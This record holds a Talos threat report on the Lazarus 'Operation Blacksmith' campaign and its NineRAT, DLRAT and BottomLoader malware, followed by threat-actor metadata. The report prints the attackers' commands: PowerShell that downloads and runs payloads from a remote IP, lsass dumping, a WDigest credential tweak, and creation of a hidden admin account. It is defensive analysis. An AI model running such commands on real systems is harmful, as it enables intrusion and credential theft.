{ "id": "82aaefb6-11f9-4947-b5b6-689b3da08fcc", "created_at": "2026-04-06T00:09:46.416009Z", "updated_at": "2026-04-10T03:38:20.041698Z", "deleted_at": null, "sha1_hash": "efbd423ef9480c50b08956e9b55a31baf9c4c8d6", "title": "Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 110350, "plain_text": "Operation Blacksmith: Lazarus targets organizations worldwide\r\nusing novel Telegram-based malware written in DLang\r\nBy Jungsoo An\r\nPublished: 2023-12-11 · Archived: 2026-04-05 19:40:12 UTC\r\nCisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation\r\nBlacksmith,” employing at least three new DLang-based malware families, two of which are remote access\r\ntrojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control\r\n(C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT\r\nas “DLRAT.” We track the DLang-based downloader as “BottomLoader.”\r\nOur latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.\r\nOver the past year and a half, Talos has disclosed three different remote access trojans (RATs) built using\r\nuncommon technologies in their development, like QtFramework, PowerBasic and, now, DLang.\r\nTalos has observed an overlap between our findings in this campaign conducted by Lazarus including\r\ntactics, techniques and procedures (TTPs) consistent with the North Korean state-sponsored group Onyx\r\nSleet (PLUTIONIUM), also known as the Andariel APT group. Andariel is widely considered to be an APT\r\nsub-group under the Lazarus umbrella. \r\nThis campaign consists of continued opportunistic targeting of enterprises globally that publicly host and\r\nexpose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228 (Log4j).\r\nWe have observed Lazarus target manufacturing, agricultural and physical security companies.\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 1 of 17\n\nLazarus Group’s, Operation Blacksmith compromised manufacturing, agriculture\r\nand physical security sectors\r\nOperation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a\r\npreviously unknown DLang-based RAT utilizing Telegram as its C2 channel. We’re naming this malware family\r\n“NineRAT.” NineRAT was initially built around May 2022 and was first used in this campaign as early as March\r\n2023, almost a year later, against a South American agricultural organization. We then saw NineRAT being used\r\nagain around September 2023 against a European manufacturing entity. \r\nDuring our analysis, Talos found some overlap with the malicious attacks disclosed by Microsoft in October 2023\r\nattributing the activity to Onyx Sleet, also known as PLUTIONIUM or Andariel. \r\nTalos agrees with other researchers’ assessment that the Lazarus APT is essentially an umbrella of sub-groups that\r\nsupport different objectives of North Korea in defense, politics, national security and research and development.\r\nEach sub-group operates its own campaigns and develops and deploys bespoke malware against their targets, not\r\nnecessarily working in full coordination. Andariel is typically tasked with initial access, reconnaissance and\r\nestablishing long-term access for espionage in support of North Korean government interests. In some cases,\r\nAndariel has also conducted ransomware attacks against healthcare organizations.\r\nThe current campaign, Operation Blacksmith, consists of similarities and overlaps in tooling and tactics observed\r\nin previous attacks conducted by the Andariel group within Lazarus.\r\nA common artifact in this campaign was  “HazyLoad,” a custom-made proxy tool previously only seen in the\r\nMicrosoft report. Talos found HazyLoad targeting a European firm and an American subsidiary of a South Korean\r\nphysical security and surveillance company as early as May 2023.\r\nIn addition to Hazyload, we discovered “NineRAT” and two more distinct malware families — both DLang-based\r\n— being used by Lazarus. This includes a RAT family we’re calling “DLRAT” and a downloader we call\r\n“BottomLoader” meant to download additional payloads such as HazyLoad on an infected endpoint.\r\nThe adoption of DLang in Lazarus’ malware — NineRAT, DLRAT and\r\nBottomLoader\r\nNineRAT uses Telegram as its C2 channel for accepting commands, communicating their outputs and even for\r\ninbound and outbound file transfer. The use of Telegram by Lazarus is likely to evade network and host-based\r\ndetection measures by employing a legitimate service as a channel of C2 communications.\r\nNineRAT consists of three components, a dropper binary that contains two other components embedded in it. The\r\ndropper will write the two components on the disk and delete itself. The first component is an instrumentor, called\r\nnsIookup.exe ( capital ‘i’ instead of lower case L) that will execute the second component and will be used in the\r\npersistence mechanism. Modular infection chains such as these are frequently used by threat actors to achieve a\r\nmultitude of objectives from defense evasion to functional separation of components that can be upgraded or\r\nmodified while avoiding noisy operations on an infected system.\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 2 of 17\n\nThe dropper will set up persistence for the first component using a BAT script. The persistence mechanism accepts\r\na service name, the path to the first component and service creation parameters:\r\nService Creation command\r\nsc create Aarsvc_XXXXXX binPath=c:\\windows\\system32\\nsIookup.exe -k AarSvcGroup -p type=own\r\nstart=auto DisplayName=Agent Activation Runtime_XXXXXX\r\n(Note the use of a capital “i” instead of “L” in nslookup[.]exe.)\r\nThe instrumentor binary contains a preconfigured path to the NineRAT malware which is used to execute the\r\nmalware:\r\nInstrumentor binary (first component) containing the path to NineRAT malware on disk.\r\nWith NineRAT activated, the malware becomes the primary method of interaction with the infected host.\r\nHowever, previously deployed backdoor mechanisms, such as the reverse proxy tool HazyLoad, remain in place.\r\nThe multiple tools give overlapping backdoor entries to the Lazarus Group with redundancies in the event a tool is\r\ndiscovered, enabling highly persistent access. In previous intrusions such as the one disclosed by Talos in 2022,\r\nLazarus relied heavily on the use of proxy tools as a means of continued access to issue commands and exfiltrate\r\ndata.\r\nThe Telegram C2 channels used by the malware led to the discovery of a previously public Telegram bot\r\n“[at]StudyJ001Bot” that was leveraged by Lazarus in NineRAT. This Bot is publicly illustrated along with its ID\r\nand communication URL in a tutorial in Korean language from 2020. Using a publicly accessible bot may lead to\r\ninfrastructure hijacking and likely having recognized that, Lazarus started using their own Bots for NineRAT.\r\nInterestingly, switching over to their own Telegram C2 channels, however, did not deter the use of older NineRAT\r\nsamples using open channels. Anadriel has continued to use them well into 2023, even though they first started\r\nwork on NineRAT in 2022. NineRAT typically consists of two API tokens for interacting with two different\r\nTelegram channels — one of these tokens is publicly listed.\r\nNineRAT interacts with the Telegram channel using DLang-based libraries implemented to talk to Telegram’s\r\nAPIs. Initially, the implant tests authentication using the getMe method. The implant can upload documents to\r\nTelegram using the sendDocument method/endpoint or download files via the getFile method. The malware can\r\naccept the following commands from their operator Telegram:\r\nCommand Capability\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 3 of 17\n\n/info Gather preliminary information about the infected system.\r\n/setmtoken Set a token value.\r\n/setbtoken Set a new Bot token.\r\n/setinterval Set time interval between malware polls to the Telegram channel.\r\n/setsleep Set a time period for which the malware should sleep/lie dormant.\r\n/upgrade Upgrade to a new version of the implant.\r\n/exit Exit execution of the malware.\r\n/uninstall Uninstall self from the endpoint.\r\n/sendfile Send a file to the C2 server from the infected endpoint.\r\nNineRAT can also uninstall itself from the system using a BAT file.\r\nBelow are some of the commands run by NineRAT for reconnaissance:\r\nCommand Intent\r\nwhoami\r\nSystem Information\r\nDiscovery [T1082]\r\nwmic os get osarchitecture\r\nSystem Information\r\nDiscovery [T1082]\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 4 of 17\n\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path\r\nAntiVirusProduct Get displayName\r\nSoftware Discovery [T1518]\r\nPivoting off the NineRAT samples, we discovered two additional malware families written in DLang by Lazarus.\r\nOne of these is simply a downloader we track as “BottomLoader” meant to download and execute the next stage\r\npayload from a remote host such as HazyLoad:\r\nStrings and embedded payload URL in the DLang-based downloader, BottomLoader.\r\nBottomLoader can download the next stage payload from a hardcoded remote URL via a PowerShell command:\r\npowershell Invoke-webrequest -URI \u003cURL\u003e -outfile \u003cfile_location_on_system\u003e\r\nIt can also upload files to the C2, again using PowerShell:\r\npowershell (New-Object System.Net.WebClient).UploadFile('\u003cfile_path\u003e','\u003cremote_url\u003e’)\r\nBottomLoader can also create persistence for newer versions or completely new follow-up payloads by creating a\r\n“.URL” file in the Startup directory to run the PowerShell command to download the payload. The URL file is\r\nconstructed using the following commands:\r\nCommand\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 5 of 17\n\necho [InternetShortcut] \u003e \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NOTEPAD.url\"\r\necho URL=\"\u003cRemote_URL\u003e\" \u003e\u003e \"%appdata%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\NOTEPAD.url\"\r\necho IconFile=C:\\WINDOWS\\system32\\SHELL32.dll \u003e\u003e \"%appdata%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\NOTEPAD.url\"\r\necho IconIndex=20 \u003e\u003e \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NOTEPAD.url\"\r\nThe other malware is a downloader and RAT, we track as “DLRAT,” which can be used to deploy additional\r\nmalware and retrieve commands from the C2 and execute them on the infected endpoints:\r\nDLRAT: A DLang-based RAT and downloader.\r\nThis malware contains hardcoded commands to perform system reconnaissance. It starts by executing the\r\ncommands on the endpoint to gather preliminary information about the system: “ver”, “whoami” and “getmac”.\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 6 of 17\n\nWith this, the operators will have information about the version of the operating system, which user is running the\r\nmalware and MAC address that allows them to identify the system on the network.\r\nDLRAT code snippet consisting of preliminary data gathering capabilities.\r\nOnce the first initialization and beacon is performed, an initialization file is created, in the same directory, with the\r\nname “SynUnst.ini”.\r\nAfter beaconing to the C2, the RAT will post, in a multipart format, the collected information and hardcoded\r\nsession information.\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 7 of 17\n\nDuring our analysis, we found that the session information ID used by DLRAT as part of its communications with\r\nits C2 server is “23wfow02rofw391ng23“, which is the same value that we found during our previous research\r\ninto MagicRAT. In the case of MagicRAT, the value is encoded as an HTML post. But with DLRAT, it's being\r\nposted as multipart/form-data. This session information is hardcoded into the DLRAT malware as a base64-\r\nencoded string constructed on the process stack during runtime:\r\nHardcoded Session ID in DLRAT, the same as MagicRAT.\r\nThe C2 reply only contains the external IP address of the implant. The malware recognizes the following\r\ncommand codes/names sent by the C2 servers to execute corresponding actions on the infected system:\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 8 of 17\n\nCommand name Capability\r\ndeleteme Delete itself from the system using a BAT file.\r\ndownload Download files from a specified remote location.\r\nrename Rename files on the system.\r\niamsleep Instructs the implant to go to sleep for a specified amount of time.\r\nupload Upload files to C2.\r\nshowurls Empty command (Not implemented yet).\r\nIllustrating operation Blacksmith\r\nThis particular attack observed by Talos involves the successful exploitation of CVE-2021-44228, also known as\r\nLog4Shell, on publicly facing VMWare Horizon servers, as a means of initial access to vulnerable public-facing\r\nservers. Preliminary reconnaissance follows the initial access leading to the deployment of a custom-made implant\r\non the infected system. \r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 9 of 17\n\nTypical Infection chain observed in Operation Blacksmith.\r\nPhase 1: Initial reconnaissance by Lazarus\r\nLazarus’s initial access begins with successful exploitation of CVE-2021-44228, the infamous Log4j vulnerability\r\ndiscovered in 2021. The vulnerability has been extensively exploited by the Lazarus umbrella of APT groups to\r\ndeploy several pieces of malware and dual-use tools, and to conduct extensive hands-on-keyboard activity.\r\nCommand Intent\r\ncmd.exe /c whoami\r\nSystem\r\nInformation\r\nDiscovery\r\n[T1082]\r\ncmd.exe /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:5 /q:*[System [(EventID=25)]] /rd:true /f:text\r\nQuery event\r\nlogs: Get\r\nRDP session\r\nreconnection\r\ninformation\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 10 of 17\n\nnet user\r\nSystem\r\nInformation\r\nDiscovery\r\n[T1082]\r\ncmd.exe /c dir /a c:\\users\\\r\nSystem\r\nInformation\r\nDiscovery\r\n[T1082]\r\ncmd.exe /c netstat -nap tcp\r\nSystem\r\nInformation\r\nDiscovery\r\n[T1082]\r\nsysteminfo\r\nSystem\r\nInformation\r\nDiscovery\r\n[T1082]\r\ncmd.exe /c Reg query\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\Wdigest\r\nOS\r\nCredential\r\nDumping\r\n[T1003/005]\r\ncmd.exe /c reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\r\n/v UseLogonCredential /t REG_DWORD /d 1\r\nOS\r\nCredential\r\nDumping\r\n[T1003/005]\r\nModify\r\nRegistry\r\n[T1112]\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 11 of 17\n\ncmd.exe /c tasklist | findstr Secu\r\nSoftware\r\nDiscovery\r\n[T1518]\r\nOnce the initial reconnaissance has been completed, Lazarus’ operators deployed HazyLoad, a proxy tool used to\r\nestablish direct access to the infected system without having to repeatedly exploit CVE-2021-44228.\r\nCommand Action\r\ncmd[.]exe /c powershell[.]exe -ExecutionPolicy ByPass -WindowStyle\r\nNormal (New-Object System[.]Net[.]WebClient).DownloadFile('hxxp[://]\r\n\u003cRemote_IP\u003e/inet[.]txt', 'c:\\windows\\adfs\\de\\inetmgr[.]exe');\r\nDownload and execute\r\nHazyLoad\r\nc:\\windows\\adfs\\de\\inetmgr[.]exe -i \u003cRemote_IP\u003e -p\r\nExecute HazyLoad reverse\r\nproxy\r\ncmd /C powershell Invoke-WebRequest hxxp[://]\r\n\u003cRemote_IP\u003e/down/bottom[.]gif -OutFile c:\\windows\\wininet64[.]exe\r\ncmd /C c:\\windows\\wininet64[.]exe -i \u003cRemote_IP\u003e -p 443\r\nDownload and execute\r\nHazyLoad\r\nIn certain instances, the operators will also switch HazyLoad over to a new remote IP address. This is a common\r\ntactic attackers use to maintain continued access to previously compromised systems as their infrastructure\r\nevolves.\r\nCommand Action\r\ncmd /C taskkill /IM wininet64[.]exe /F\r\nStop original HazyLoad\r\nexecution\r\ncmd /C c:\\windows\\wininet64[.]exe -i \u003cRemote_IP\u003e -p 443\r\nReLaunch HazyLoad with\r\nnew parameters\r\nThe threat actors also created an additional user account on the system, granting it administrative privileges. Talos\r\ndocumented this TTP earlier this year, but the activity observed previously was meant to create unauthorized user\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 12 of 17\n\naccounts at the domain level. In this campaign, the operators created a local account, which matches the user\r\naccount documented by Microsoft.\r\nCommand Intent\r\ncmd.exe /c net user krtbgt \u003cpassword\u003e /add Account Creation [T1136]\r\ncmd.exe /c net localgroup Administrators krtbgt /add\r\nAccount Creation\r\n[T1098]\r\ncmd.exe /c net localgroup Administrators User Discovery [T1033]\r\nOnce the user account was successfully set up, the attackers switched over to it for their hands-on-keyboard\r\nactivity, which constitutes a deviation from the pattern Cisco Talos previously documented. The hands-on-keyboard activity begins by downloading and using credential dumping utilities such as ProcDump and\r\nMimiKatz.\r\nCommand Intent\r\nprocdump.exe -accepteula -ma lsass.exe lsass.dmp\r\nCredential harvesting\r\n[T1003]\r\npwdump.exe //Mimikatz\r\nCredential harvesting\r\n[T1003]\r\nPhase 2: Lazarus deploys NineRAT\r\nOnce the credential dumping is complete, Lazarus deploys a previously unknown RAT we’re calling “NineRAT”\r\non the infected systems. NineRAT was first seen being used in the wild by Lazarus as early as March 2023.\r\nNineRAT is written in DLang and indicates a definitive shift in TTPs from APT groups falling under the Lazarus\r\numbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt\r\nframework, including MagicRAT and QuiteRAT.\r\nOnce NineRAT is activated, it accepts preliminary commands from the Telegram-based C2 channel, to again\r\nfingerprint the infected systems. Re-fingerprinting the infected systems indicates the data collected by Lazarus via\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 13 of 17\n\nNineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint\r\ndata collected initially by Lazarus during their initial access and implant deployment phase.\r\nCommands typically executed by NineRAT include:\r\nCommand Intent\r\ncmd.exe /C ipconfig /all\r\nSystem Information Discovery\r\n[T1082]\r\ncmd.exe /C ver\r\nSystem Information Discovery\r\n[T1082]\r\ncmd.exe /C wmic os get osarchitecture\r\nSystem Information Discovery\r\n[T1082]\r\ncmd.exe /C WMIC /Node:localhost\r\n/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get\r\ndisplayName\r\nSoftware Discovery [T1518]\r\ncmd.exe /C net group /domain Domain Computers\r\nSystem Information Discovery\r\n[T1082]\r\ncmd.exe /C netstat -nap tcp\r\nSystem Information Discovery\r\n[T1082]\r\ncmd.exe /C whoami\r\nSystem Information Discovery\r\n[T1082]\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 14 of 17\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nIOCs for this research can also be found at our GitHub repository here.\r\nHashes\r\nHazyLoad\r\n000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 15 of 17\n\nNineRAT\r\n534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433\r\nba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4\r\n47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30\r\nf91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59\r\n5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541\r\n82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def\r\nBottomLoader\r\n0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f\r\nDLRAT\r\ne615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f\r\n9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a\r\nNetwork IOCs\r\ntech[.]micrsofts[.]com\r\ntech[.]micrsofts[.]tech\r\n27[.]102[.]113[.]93\r\n185[.]29[.]8[.]53\r\n155[.]94[.]208[.]209\r\n162[.]19[.]71[.]175\r\n201[.]77[.]179[.]66\r\nhxxp://27[.]102[.]113[.]93/inet[.]txt\r\nhxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif\r\nhxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php\r\nhxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif\r\nhxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 16 of 17\n\nSource: https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nhttps://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/" ], "report_names": [ "lazarus_new_rats_dlang_and_telegram" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", 